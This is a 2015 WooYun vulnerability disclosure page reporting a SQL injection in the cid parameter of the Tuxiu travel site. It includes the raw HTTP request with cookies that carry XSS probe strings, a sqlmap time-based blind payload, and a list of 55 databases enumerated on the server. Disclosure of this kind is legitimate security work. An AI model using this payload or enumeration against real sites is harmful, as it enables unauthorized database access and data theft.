当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142182

漏洞标题:途秀网官网SQL注入

相关厂商:cncert国家互联网应急中心

漏洞作者: xunnun

提交时间:2015-09-24 00:02

修复时间:2015-11-12 15:30

公开时间:2015-11-12 15:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-28: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-08: 细节向核心白帽子及相关领域专家公开
2015-10-18: 细节向普通白帽子公开
2015-10-28: 细节向实习白帽子公开
2015-11-12: 细节向公众公开

简要描述:

rt

详细说明:

GET /listing/places?cid=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: PHPSESSID=o5tngg5fs509lr6fg5eeghlau3; backurl=http%3A%2F%2Fwww.**.**.**.**%2Fsearch; callbackurl=%2Fweiboapp%2Flogin%2Fchk; newyear2014_from=http%3A%2F%2F**.**.**.**%2F; todaysidck=55fb963ca305c; referer=http%3A%2F%2F**.**.**.**%2F5343689283%2F4327695; weiboapp_login_backurl=%2Fcampaign%2Fqinghua%2F; __utmt=1; __utma=268593204.2040536378.1442551819.1442551819.1442551819.1; __utmb=268593**.**.**.**2551819; __utmc=268593204; __utmz=268593204.1442551819.1.1.utmcsr=**.**.**.**|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); HMACCOUNT=3BA26C382E083970; Hm_lvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442563723,1442564047,1442564800,1442566102; Hm_lpvt_8b7ad7e6229fe01059ceb32fb2c1a73b=1442566102; 2014_show=question; _pk_ref.1.07eb=%5B%22%22%2C%22%22%2C1442552029%2C%22http%3A%2F%2Fwww.**.**.**.**%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.1.07eb=f126e2a981e3a5cc.1442552029.1.1442566105.1442552029.; _pk_ses.1.07eb=*; 2014_goto=http%3A//**.**.**.**/campaign/newyear/activity/1753936%23to4; _ga=GA1.2.2040536378.1442551819; _gat=1; jiathis_uniqid=144255735255fbada8c2be2
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


cid参数存在注入

sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: cid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))XDvI)
---
web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.12

漏洞证明:

倒数第二个数据库就是途秀的

web application technology: PHP 5.4.42
back-end DBMS: MySQL 5.0.12
available databases [55]:
[*] `minisite_xqunar\x19`
[*] `performance_sp\\?81ema`
[*] app
[*] atlantis_campaign
[*] ayana
[*] b2b
[*] banff2015db
[*] bhrdb
[*] chinatravelacademy
[*] class_dhinatravelacademy
[*] conference
[*] cool_summer_db
[*] cta_pay
[*] ctb
[*] ctb_apps
[*] ctb_statusnet
[*] ctb_ws
[*] dingla
[*] draweuropedb
[*] dte
[*] hertzintroduce
[*] hirtz
[*] hotelbooking
[*] information_schema
[*] live_meeting
[*] losanheles
[*] mhrdb
[*] minisite_ctrip
[*] minisite_czech
[*] minisite_hertz
[*] minisite_ihg
[*] minisite_loverday
[*] minisite_newyear
[*] minisite_ngwworld
[*] minisite_nontrealcarnival
[*] minisite_phg
[*] minisite_ptf
[*] minisite_riviera
[*] minisite_sweden_education
[*] minisite_sweden_innovation
[*] minisite_sweden_lifestyle
[*] minisite_sweden_music
[*] minisite_villaducale
[*] minisite_visitgurope
[*] minisitf_sweden
[*] miniyite_nwbjg
[*] moevenpick
[*] mysql
[*] opentraveldatabase
[*] piwik
[*] service
[*] sweden_show
[*] test
[*] tripshow
[*] yioulai

修复方案:

版权声明:转载请注明来源 xunnun@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-28 15:29

厂商回复:

CNVD未直接复现所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无